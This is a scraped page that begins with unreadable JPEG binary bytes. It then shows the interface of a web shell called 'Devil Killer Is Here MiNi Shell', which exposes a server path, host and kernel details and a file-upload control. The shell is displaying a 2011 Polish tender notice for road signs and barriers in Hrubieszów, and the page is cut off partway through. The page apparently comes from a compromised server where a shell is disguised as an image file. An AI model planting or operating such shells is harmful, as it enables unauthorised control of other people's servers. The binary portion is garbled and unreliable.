JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110506/130807-N-2011.html

<p class="kh_header"><b>Hrubieszów: Dostawa znaków drogowych i urządzeń bezpieczeństwa ruchu drogowego wraz z ich montażem  na drogach wojewódzkich administrowanych przez RDW Hrubieszów zgodnie z załącznikami 1-4 do Rozporządzenia Ministra Infrastruktury z dn. 03 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U nr 220, poz. 2181 z dn. 23-12-2003 r. z późniejszymi  zmianami)</b><br>
<b>Numer ogłoszenia: 130807 - 2011; data zamieszczenia: 06.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich w Lublinie Rejon Dróg Wojewódzkich w Hrubieszowie , ul. Grabowiecka 18b, 22-500 Hrubieszów, woj. lubelskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ebip.lublin.pl/zdw</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa znaków drogowych i urządzeń bezpieczeństwa ruchu drogowego wraz z ich montażem  na drogach wojewódzkich administrowanych przez RDW Hrubieszów zgodnie z załącznikami 1-4 do Rozporządzenia Ministra Infrastruktury z dn. 03 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U nr 220, poz. 2181 z dn. 23-12-2003 r. z późniejszymi  zmianami).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1:
1)	Dostawa słupków metalowych ocynkowanych O 60mm o zmiennej długości 3,5÷4,20 mb w ilości 100 szt wraz z demontażem istniejących w terenie znaków drogowych (słupek i tablica znaku), zamocowaniem  zdjętej tablicy znaku i zamontowaniem całości zgodnie z Projektem Stałej Organizacji Ruchu (PSOR) oraz zwrot zdemontowanych słupków na teren Obwodu Drogowego w Hrubieszowie do dnia zgłoszenia zamówienia do odbioru. Droga wojewódzka nr 846 - szt. 100. W tym: 24  szt. słupków wys. 4,20 m i  76 szt. słupków wys. 3,50 m.
2)	Dostawa tablic E-15b, słupków ocynkowanych O 60 mm o długości 3,50 m 
oraz montaż ww tablicy i słupka w określonej w PSOR kilometracji. 
Droga wojewódzka nr 844- szt. 38. 
3)	Dostawa i montaż słupków U-1a wraz z oklejeniem słupków naklejkami zgodnie z PSOR. Drogi woj. nr 844, 846, 850, 852 - szt. 200.
4)	Dostawa i montaż słupków U-1b zgodnie z PSOR. Drogi woj. nr 844, 846, 850, 852 - szt. 26.
Zadanie nr 2:
1)	Dostawa oraz montaż urządzeń bezpieczeństwa ruchu drogowego tj. elementów azyli przejścia dla pieszych z tworzyw sztucznych zgodnie z PSOR w skład czego wchodzą:
Element zewnętrzny 50x50 szt. 72.
Element wewnętrzny 50x50 szt. 54.
Element narożny 50x50 szt. 24.
Droga wojewódzka nr 844 ul. Zamojska. - szt. 150.	
2)	Dostawa i montaż urządzeń bezpieczeństwa ruchu drogowego do oznakowania azyli przejścia dla pieszych zgodnie z PSOR w skład czego wchodzą:
C-9 II-ga generacja szt. 6.
U-5a szt. 6.
Słupek 3,50 szt. 6.
Tuleja przegubowa szt. 6.
Droga wojewódzka nr 844 ul. Zamojska. - kompletów 6.
Zadanie nr 3:
1)	Dostawa i montaż urządzeń bezpieczeństwa ruchu drogowego tj. elementów płyt typu BRAIL. Droga wojewódzka nr 844 w m. Hrubieszów ul. 3-go maja - szt. 16.

Zadanie nr 4:
1)	Dostawa oraz montaż nowych, brakujących typowych elementów barier energochłonnych Sp - 04. Demontaż istniejących w terenie barier energochłonnych typu Sp - 04 oraz ich ponowny poprawny montaż wraz z  nowymi elementami.
Droga wojewódzka nr 850 w m. Zamłynie - mb 361. W tym wymiana 2 szt. prowadnic typu B, oraz 24 szt. tylnych pasów ochronnych.

Zadanie nr 5:
1)	Dostawa wraz z montażem nowych elementów barierek drogowych U-12b typ Olsztyński z betonowaniem słupka mocującego na głębokość, co najmniej 1,5 m w skarpie istniejącego rowu oraz demontaż barierek drogowych U-12b istniejących 
w terenie i zwrot zdemontowanych barierek na teren Obwodu Drogowego 
w Hrubieszowie do dnia zgłoszenia zamówienia do odbioru.
W skład dostawy wchodzą:
Przęsło ogrodzeniowe dł. 2 m - 46 szt.
Przęsło ogrodzeniowe dł. 1,5 m - 2 szt.
Słupek mocujący dł. 3m - 52 szt.
Droga wojewódzka nr 846 w m. Wojsławice - mb 95.
2)	Dostawa wraz z montażem nowych elementów barierek drogowych U-12b typ Olsztyński z betonowaniem słupka mocującego na głębokość, co najmniej 1,5 m w skarpie istniejącego rowu oraz demontaż barierek drogowych U-12b istniejących w terenie i zwrot zdemontowanych barierek na teren Obwodu Drogowego w Tyszowcach do dnia zgłoszenia zamówienia do odbioru. W skład dostawy wchodzą:
Przęsło ogrodzeniowe dł. 2 m - 102 szt.
Przęsło ogrodzeniowe dł. 1,5 m - 2 szt.
Słupek mocujący dł. 3m - 108 szt.
Droga wojewódzka nr 850 w m. Tyszowce - mb 207.
3) Dostawa wraz z montażem nowych elementów barierek drogowych U-12b typ Olsztyński z betonowaniem słupka mocującego na głębokość, co najmniej 1,5 m w skarpie istniejącego rowu oraz demontaż barierek drogowych U-12b istniejących w terenie i zwrot zdemontowanych barierek na teren Obwodu Drogowego w Hrubieszowie do dnia zgłoszenia zamówienia do odbioru. W skład dostawy wchodzą:
Przęsło ogrodzeniowe dł. 2 m - 8 szt.
Słupek mocujący dł. 3m - 9 szt.
Droga wojewódzka nr 844 w m. Mojsławice - mb 16.
PKWiU  25.11.23.0 Pozostałe konstrukcje i ich części; płyty, pręty, kątowniki, kształtowniki     itp. z żeliwa, stali lub aluminium.
22.29.29.0 Pozostałe wyroby z tworzyw sztucznych.
25.94.11.0, Elementy złączne, śruby i wkręty z żeliwa lub stali, gwintowane, gdzie indziej niesklasyfikowane.
Wartość zamówienia: 117 866,67 zł.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.92.21.00-7, 45.23.32.90-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje składania wadium do powyższego zamówienia.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Na  potwierdzenie  spełnienia  warunku  posiadania wiedzy  i  doświadczenia Wykonawca winien wykazać się  wykonaniem w ciągu ostatnich 3 lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - to  w tym okresie , 
A) dla zadania nr 1 minimum 1 dostawy: tablic , znaków drogowych , słupków metalowych do znaków oraz słupków typu U-1 wraz z ich montażem przy drogach wojewódzkich w ilości nie mniejszej niż określone w opisie zadania nr 1
B)  dla zadania nr 2 minimum 1 dostawy elementów azyli przejść dla pieszych oraz urządzeń bezpieczeństwa ruchu drogowego do oznakowania azyli przejść dla pieszych wraz z ich montażem w ilości nie mniejszej niż określone w opisie zadania nr 2
C) dla zadania nr 3 minimum  1 dostawy wraz z montażem elementów bezpieczeństwa ruchu - płyty typu BRAIL do oznakowania dojść do przejść dla pieszych  dla niewidomych w ilości nie mniejszej niż wskazana w opisie zadania nr 3
D)  dla zadania nr 4 minimum 1 dostawy wraz z montażem barier energochłonnych metalowych U-14 a typu SP-04 w ilości nie mniejszej niż wskazana w opisie zadania nr 4
E) dla zadania nr 5 minimum 1 dostawy wraz z montażem barierek drogowych U-12 b typ OLSZTYŃSKI w ilości nie mniejszej niż wskazana w opisie zadania nr 5</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Na potwierdzenie spełniania warunku dysponowania odpowiednim potencjałem technicznym Wykonawca winien dysponować jednostkami sprzętu i środkami  transportu wymienionymi poniżej:
a)   Dla zadań nr 1 i 5:
1. Samochód dostawczy 1.
2. Wiertnica mechaniczna 1.
b) Dla zadań nr 2 i 3:
1. Samochód dostawczy 1.
2. Wiertarki udarowe 2.
c) Dla zadania nr  4:
1. Samochód dostawczy 1.
2. Urządzenie do montażu w poboczu drogi słupków barier energochłonnych 1.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Na potwierdzenie spełniania warunku dysponowania potencjałem kadrowym  tj. osobami zdolnymi do wykonania zamówienia, Wykonawca winien dysponować brygadą robotników min. 6 osób.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ebip.lublin.pl/zdw<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejon Dróg Wojewódzkich w Hrubieszowie ul. Grabowiecjka 18b, 22-500 Hrubieszów - pokój Sekcji Technicznaej - bezpłatnie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.05.2011 godzina 10:00, miejsce: Rejon Dróg Wojewódzkich w Hrubieszowie ul. Grabowiecjka 18b, 22-500 Hrubieszów  - Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Informacje o sposobie porozumiewania się Zamawiającego z Wykonawcami, 
oraz przekazywania oświadczeń lub dokumentów, z podaniem adresu poczty
elektronicznej lub strony internetowej Zamawiającego, jeżeli zamawiający
dopuszcza porozumiewanie się drogą elektroniczną.
2. Oświadczenia,  wnioski,  zawiadomienia  oraz  informacje  Zamawiający  
i Wykonawcy przekazują za pomocą faksu nr 84 696-20-95, pocztą elektroniczną  na adres e-mail: rdw.hrubieszow@zdw.lublin.pl  lub pocztą za zwrotnym poświadczeniem odbioru na adres wskazany w pkt I SIWZ. 
3. Jeżeli Zamawiający lub  Wykonawca  przekazują  oświadczenia,  wnioski, zawiadomienia oraz informacje drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
4. Wykonawcy którzy uzyskają niniejszą specyfikację ze strony internetowej Zamawiającego lub w inny sposób i zamierzają ubiegać się o udzielenie zamówienia, proszeni są o przesłanie krótkiej informacji faksem 84 696-20-95 lub pocztą elektroniczną na adres rdw.hrubieszow@zdw.lublin.pl zawierającej podstawowe dane firmy (nazwa, adres, numer tel. i faksu, adres poczty elektronicznej). 
5. Wykonawcy, którzy zgłoszą w ten sposób zamiar ubiegania się o udzielenie zamówienia będą przez Zamawiającego indywidualnie, bezpośrednio zawiadamiani o np: zapytaniach, wyjaśnieniach i zmianach dotyczących specyfikacji istotnych warunków zamówienia, odwołań i rozstrzygnięciach tych odwołań, zwołaniu przez Zamawiającego zebrania wszystkich Wykonawców, przedłużeniu terminu składania ofert.
6. Wskazanie osób uprawnionych do porozumiewania się z Wykonawcami:
W sprawach formalno-prawnych związanych z postępowaniem przetargowym
informacji udziela Pan Robert Pasieka, w sprawach technicznych Pan Paweł Kozdroń, tel. 84 696-20-93 w godz. 8-14 ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa znaków drogowych i urządzeń bezpieczeństwa ruchu drogowego wraz z ich montażem  na drogach wojewódzkich administrowanych przez RDW Hrubieszów zgodnie z załącznikami 1-4 do Rozporządzenia Ministra Infrastruktury z dn. 03 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U nr 220, poz. 2181 z dn. 23-12-2003 r. z późniejszymi  zmianami).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1:
1) Dostawa słupków metalowych ocynkowanych O 60mm o zmiennej długości 3,5÷4,20 mb w ilości 100 szt wraz z demontażem istniejących w terenie znaków drogowych (słupek i tablica znaku), zamocowaniem  zdjętej tablicy znaku i zamontowaniem całości zgodnie z Projektem Stałej Organizacji Ruchu (PSOR) oraz zwrot zdemontowanych słupków na teren Obwodu Drogowego w Hrubieszowie do dnia zgłoszenia zamówienia do odbioru.
Droga wojewódzka nr 846 - szt. 100. W tym: 24  szt. słupków wys. 4,20 m i  76 szt. słupków wys. 3,50 m.
2) Dostawa tablic E-15b, słupków ocynkowanych O 60 mm o długości 3,50 m 
oraz montaż w/w tablicy i słupka w określonej w PSOR kilometracji. 
Droga wojewódzka nr 844- szt. 38. 
3) Dostawa i montaż słupków U-1a wraz z oklejeniem słupków naklejkami zgodnie 
z PSOR. Drogi woj. nr 844, 846, 850, 852 - szt. 200.
4) Dostawa i montaż słupków U-1b zgodnie z PSOR. Drogi woj. nr 844, 846, 850, 852 - szt. 26. Wartość zadania: 30 778,86 zł..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.21.00-7, 45.23.32.90-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa znaków drogowych i urządzeń bezpieczeństwa ruchu drogowego wraz z ich montażem  na drogach wojewódzkich administrowanych przez RDW Hrubieszów zgodnie z załącznikami 1-4 do Rozporządzenia Ministra Infrastruktury z dn. 03 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U nr 220, poz. 2181 z dn. 23-12-2003 r. z późniejszymi  zmianami).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2:
1) Dostawa oraz montaż urządzeń bezpieczeństwa ruchu drogowego tj. elementów azyli przejścia dla pieszych z tworzyw sztucznych zgodnie z PSOR w skład czego wchodzą:
Element zewnętrzny 50x50 szt. 72.
Element wewnętrzny 50x50 szt. 54.
Element narożny 50x50 szt. 24.
Droga wojewódzka nr 844 ul. Zamojska. - szt. 150.	
2) Dostawa i montaż urządzeń bezpieczeństwa ruchu drogowego do oznakowania azyli przejścia dla pieszych zgodnie z PSOR w skład czego wchodzą:
C-9 II-ga generacja szt. 6.
U-5a szt. 6.
Słupek 3,50 szt. 6.
Tuleja przegubowa szt. 6.
Droga wojewódzka nr 844 ul. Zamojska. - kompletów 6.
Wartość zadania 16 487,80 zł..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.21.00-7, 45.23.32.90-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa znaków drogowych i urządzeń bezpieczeństwa ruchu drogowego wraz z ich montażem  na drogach wojewódzkich administrowanych przez RDW Hrubieszów zgodnie z załącznikami 1-4 do Rozporządzenia Ministra Infrastruktury z dn. 03 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U nr 220, poz. 2181 z dn. 23-12-2003 r. z późniejszymi  zmianami).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3:
1) Dostawa i montaż urządzeń bezpieczeństwa ruchu drogowego tj. elementów płyt typu BRAIL. Droga wojewódzka nr 844 w m. Hrubieszów ul. 3-go maja - szt. 16.
Wartość zadania: 2 666,67 zł..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.21.00-7, 45.23.32.90-8.</p></li>
